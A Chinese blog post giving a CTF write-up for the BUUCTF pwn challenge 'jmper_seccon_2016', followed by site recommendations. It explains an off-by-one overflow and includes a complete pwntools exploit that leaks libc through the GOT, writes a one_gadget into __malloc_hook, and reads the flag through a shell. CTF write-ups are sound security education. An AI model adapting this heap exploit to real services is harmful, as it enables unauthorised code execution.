[BUUCTF-pwn] jmper_seccon_2016

最新推荐文章于 2024-07-05 00:40:26 发布
最新推荐文章于 2024-07-05 00:40:26 发布
阅读量601 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122603530
版权

so easy

程序建了管理块0x30 :id:8,memo:0x20,ptr->name

name块:0x20

但在写memo时多写了一个字符

        for ( i = 0; i <= 32; ++i )             // 多写一个
        {
          v1 = getchar();
          if ( v1 == 10 )
            break;
          *v5++ = v1;
        }

这就好办了,每edit_memo将name块前提0x20字节,再edit_name将指针改为got,然后show_name得到libc

然后建重来一个,将指针改为malloc_hook,将one_gadget写进去,再去建块触发就行了。

from pwn import *

local = 0
if local == 1:
    p = process('./pwn')
else:
    p = remote('node4.buuoj.cn', 25452) 

libc_elf = ELF('../buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so')
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
libc_start_main_ret = 0x20830

elf = ELF('./pwn')
context.arch = 'amd64'
context.log_level = 'debug'

menu = b':)\n'
def add():
    p.sendlineafter(menu, b'1')

def edit_name(idx, name):
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b"ID:", str(idx).encode())
    p.sendlineafter(b"Input name:", name)

def edit_memo(idx, memo):
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b"ID:", str(idx).encode())
    p.sendlineafter(b"Input memo:", memo)

def show_name(idx):
    p.sendlineafter(menu, b'4')
    p.sendlineafter(b"ID:", str(idx).encode())

def show_memo(idx):
    p.sendlineafter(menu, b'5')
    p.sendlineafter(b"ID:", str(idx).encode())

add()
edit_memo(0, b'A'*0x20+b'\n')
show_memo(0)
p.recvuntil(b'A'*0x20)
heap_base = u64(p.recvuntil(b'1. ', drop=True).ljust(8, b'\x00')) -0x220
print('heap:', hex(heap_base))

edit_memo(0, b'A'*0x20+b'\x00')
edit_name(0, b'A'*8 + p64(elf.got['puts']))
show_name(0)
libc_base = u64(p.recvuntil(b'1. ', drop=True).ljust(8, b'\x00')) - libc_elf.sym['puts']
libc_elf.address = libc_base
print('libc:', hex(libc_base))

add()
edit_memo(1, b'A'*0x20+b'\x70')
edit_name(1, b'A'*8 + p64(libc_elf.sym['__malloc_hook']))
edit_name(1, p64(libc_base + one[3]))

add()

p.sendline(b'cat /flag')
p.interactive()

石氏是时试
关注
专栏目录
Seccon CTF 2016 部分Writeup.md
Bendawang's Blog
12-15 2572
Seccon CTF 2016 部分Writeup
Seccon CTF 2016 biscuiti writeup
Bendawang's Blog
12-15 3447
web300 biscuiti 题解 (web + crypto)
Pwn 学习
qq_41672971的博客
09-26 1400
windows pwn
BUUCTF-PWN】5-pwn1_sctf_2016
燕麦葡萄干的博客
07-04 190
变量s在栈中的位置位0x3c,想要溢出到Rbp需要60+4(因为是32位)=64。fgets()函数只允许输入32位长度,但是I可以变为you,因此可以输入20个I加三个a。这里中间处理的代码还看不太懂,只能看到you、i还有replace字符替换函数。试着运行效果如下,可知代码会把输入的I替换为you。找一下后门函数,函数的位置是0x8048F0D。strcpy()函数存在缓冲区溢出。32位,开启了NX保护。
BUUCTF-PWN】3-warmup_csaw_2016
燕麦葡萄干的博客
07-04 213
checksec检查是64位,未开启任何保护。直接字符串查找system或者flag。后门函数的地址是0x40060D。gets()函数存在栈溢出。
BUUCTF-PWN】12-get_started_3dsctf_2016
燕麦葡萄干的博客
07-05 1177
垃圾数据–>mprotect函数地址–>三个连续的pop地址–>.got.plt表起始地址–>内存长度–>内存权限–>read函数–>三个连续的pop地址–>read函数的三个参数–> .got.plt表的起始位置。其中gets()函数存在栈溢出,溢出距离为0x38,这里是使用的esp寻址,属于外平栈,不需要覆盖ebp的四个字节。第二种是直接在IDA中查找,crtl+s调出程序的段表,这里还不太清楚怎么去选择可用的程序段,看很多博客都是直接用的.got.plt的起始位置。
BUUCTF|PWN-pwn1_sctf_2016
Rt1Text的博客
04-23 640
1.checksec+运行 32位+NX保护
BUUCTF--lctf2016_pwn200
qq_73149934的博客
04-01 306
free(ptr)后再malloc(0x30),得到这块fake_chunk的控制权,接着将返回地址(get_money_ret)覆盖为shellcode_addr,退出拿到shell。向$buf输入,构造fake_chunk且覆盖dest(ptr)的size,同时修改ptr指向fake_chunk的mem部分。这里得到的是rbp中的值,不是rbp的地址,通过调试得到偏移。3.利用”give me money~“,布置。5.修改返回地址为shellcode的地址。是一个入住宾馆的题目。
BUUCTF Pwn pwn1_sctf_2016
MrTreebook的博客
12-05 1339
BUUCTF Pwn pwn1_sctf_20161.题目下载地址2.checksec检查保护3.IDA分析4.看一下栈大小5.找到后门函数地址6.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 运行一下看看 3.IDA分析 看一下伪代码 int vuln() { const char *v0; // eax char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1022
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
【通信仿真】基于matlab数字信号增量调制【Matlab仿真 2381期】.zip
11-10
CSDN Matlab武动乾坤上传的资料均有对应的代码,代码均可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博客文章底部QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
ModemManager-glib-devel-1.6.10-3.el7_6.i686.rpm
11-10
Centos7 el7.x86_64 官方离线安装包,安装指令为 sudo rpm -ivh ModemManager-glib-devel-1.6.10-3.el7_6.i686.rpm
基于java的装备展示与销售平台答辩PPT.pptx
最新发布
11-10
基于java的装备展示与销售平台答辩PPT.pptx
IMG_20241110_171336.jpg
11-10
IMG_20241110_171336.jpg
【信息融合】基于matlab平方根容积卡尔曼滤波SRCKF信息融合(无反馈)【含Matlab源码 9096期】.mp4
11-10
Matlab领域上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
基于Java+SpringBoot+Vue的私人诊所管理系统答辩PPT.pptx
11-10
基于Java+SpringBoot+Vue的私人诊所管理系统答辩PPT.pptx
基于Java+SpringBoot+Vue的电影播放平台答辩PPT.pptx
11-10
基于Java+SpringBoot+Vue的电影播放平台答辩PPT.pptx
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值